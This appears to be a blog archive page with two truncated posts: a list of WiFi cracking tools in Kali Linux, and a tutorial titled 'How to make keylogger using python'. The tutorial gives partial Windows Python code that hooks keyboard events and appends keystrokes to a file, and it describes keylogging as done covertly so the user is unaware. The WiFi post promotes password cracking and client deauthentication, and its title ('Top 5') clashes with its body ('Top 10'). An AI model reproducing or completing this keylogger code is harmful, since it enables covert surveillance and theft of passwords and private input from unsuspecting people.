Posts

Showing posts from December, 2017

Top 5 WiFi Hacking tools in Kali Linux

How to hack WiFi is second popular search after how to hack a Facebook. Most of the routers are not correctly configured and are susceptible to various kinds of attacks. A lot of the router manufacturers and ISPs are still turning on WPS by default on their routers which makes the wireless security and penetration testing an even more important. Using the below Top 10 Wifi Hacking Tools you will be able to test your own wireless networks to find potential security issues. 1 Aircrack-ng Aircrack is one of the very popular tools for WPA/WPA2/WEP cracking. The Aircrack-ng suite contains tools that help to capture packets and handshakes, de-authenticate connected clients and generate traffic and also tools to perform brute force and dictionary attacks. Aicrack-ng is an all-in-one suite that contains the following tools and many others: – Aireplay-ng to generate traffic and client de-authentication – Aircrack-ng for wireless password cr...

How to make keylogger using python

Image
Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording (logging) the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored. Keylogging can also be used to study human–computer interaction. Numerous keylogging methods exist: they range from hardware and software-based approaches to acoustic analysis. STEP 1: From the start menu select,” Python 2.7 > IDLE(Python GUI)” STEP 2:   Click “File > New window” STEP 3:  Now type the below code in Python window  as shown in fig., G import win32api import sys import pythoncom , pyHook buffer = '' def OnKeyboardEvent ( event ): if event . Ascii == 5 : sys . exit () if event . Ascii != 0 or 8 : f = open ( 'c:\\output.txt' , 'a' ) keylogs = chr ( event . Ascii ) if event . Ascii == 13 : keylogs = keylogs + '\n' f...